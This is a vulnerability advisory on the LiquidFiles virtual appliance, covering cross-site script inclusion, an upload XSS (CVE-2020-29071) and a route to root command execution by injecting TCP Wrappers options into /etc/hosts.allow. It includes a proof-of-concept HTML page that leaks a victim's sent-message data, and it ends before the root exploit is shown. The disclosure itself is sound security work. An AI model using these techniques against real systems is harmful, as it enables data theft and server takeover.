LiquidFiles is a virtual appliance that helps companies and organizations send, receive and share large files quickly and securely.
Vulnerabilities were found in the LiquidFiles virtual appliance in the way it renders user-controlled content. By targeting a logged-in user, an attacker can carry out client-side attacks whose impact ranges from disclosing information about encrypted e-mails to executing commands as root on the server, depending on the privileges of the targeted user. Client-side interaction is required for these attacks to succeed (e.g. the victim visiting an attacker-controlled website).
This vulnerability was discovered and researched by Leandro Barragan.
For example, requesting the sent-messages listing in its JavaScript format (/messages/sent?format=js) returns a script that writes every sent e-mail into the page:
$("#messages").html('<thead>\n <tr>\n <th>ID<\/th>\n <th><a href=\"/messages/sent?direction=asc&sort=recipients\">Recipients<\/a><\/th>\n <th><a href=\"/messages/sent?direction=asc&sort=subject\">Subject<\/a><\/th>\n <th>Filename<\/th>\n <th><a href=\"/messages/sent?direction=asc&sort=size\">Size<\/a><\/th>\n <th><a class=\"current desc\" href=\"/messages/sent?direction=asc&sort=messages.created_at\">Sent<\/a><\/th>\n <th><a href=\"/messages/sent?direction=asc&sort=messages.expires_at\">Expires<\/a><\/th>\n <th class=\"center\"><a href=\"/messages/sent?direction=asc&sort=downloads\">Downloads<\/a><\/th>\n <th>Action<\/th>\n <\/tr>\n<\/thead>\n<tbody>\n <tr>\n <td class=\"id-column\">fFAfVtDezDDAbhEjhlXGuE<\/td>\n <td class=\"recipients_column\">firstname.lastname@example.org<\/td>\n <td class=\"subject_column\">Test<\/td>\n <td class=\"download_column wrap\"><\/td>\n <td class=\"nowrap\">0 Bytes<\/td>\n\n <td class=\"expires_column nowrap\">12 Dec, 2019 18:14<\/td>\n <td class=\"expires_column nowrap\">11 Jan, 2020<\/td>\n <td class=\"downloads_column center\">\n 0\n <\/td>\n <td class=\"actions_column nowrap\">\n <ul class=\"nav nav-pills\">\n <li class=\"dropdown\"><a class=\"dropdown-toggle\" data-toggle=\"dropdown\" href=\"#\"><b class=\"caret\"><\/b><\/a>\n <ul class=\"dropdown-menu dropdown-menu-right\">\n <li><a data-toggle=\"modal\" data-target=\"#message_modal\" data-cache=\"false\" href=\"/message/fFAfVtDezDDAbhEjhlXGuE/popup\">View Message (Popup)<\/a><\/li>\n <li><a href=\"/message/fFAfVtDezDDAbhEjhlXGuE\">View Message<\/a><\/li> [...SNIPPED...]
Because the response is plain JavaScript, an attacker can include that endpoint from a website they control: the victim's browser fetches it with the victim's session cookies and executes it in the attacker's page, exposing the information about the encrypted messages the user sent in the past. (This depends on the session cookie being sent with a cross-site script include; a cookie the browser treats as SameSite=Lax or Strict would not be attached to such a request.)
<html>
  <head>
    <script src="https://code.jquery.com/jquery-3.4.1.js"></script>
  </head>
  <body>
    <div id="messages" class="messages"></div>
    <script src="https://server/messages/sent?format=js"></script>
  </body>
</html>
After obtaining the IDs of the sent messages, their contents can also be disclosed by including the following URL:
This issue is not limited to the endpoints mentioned above: approximately 109 ERB views were found to be affected in the same way.
[CVE-2020-29071] A cross-site scripting issue was found that can be exploited by uploading HTML files through the "Shares" feature.
Leveraging this behaviour, it is possible to obtain code execution as root on the appliance by targeting users with "Sysadmin" privileges. LiquidFiles offers a way to set a password for logging into the appliance over SSH, but that password can only be set on the Sysadmin's first login and cannot be changed afterwards through the web interface. Since the targeted user will not always be at that first login, this option is not ideal.
Another method exists to achieve code execution. The "Access Control" setting in the UI embeds the user input verbatim in /etc/hosts.allow. TCP Wrappers can execute commands from that file (the option fields documented in hosts_options(5), such as spawn), so an attacker can submit a specially crafted "Allowed Hosts" list that runs arbitrary commands as root the next time any client connects to the SSH daemon on the server; no valid SSH credentials are needed, since the command runs on the connection attempt itself. A proof of concept document for this is provided below: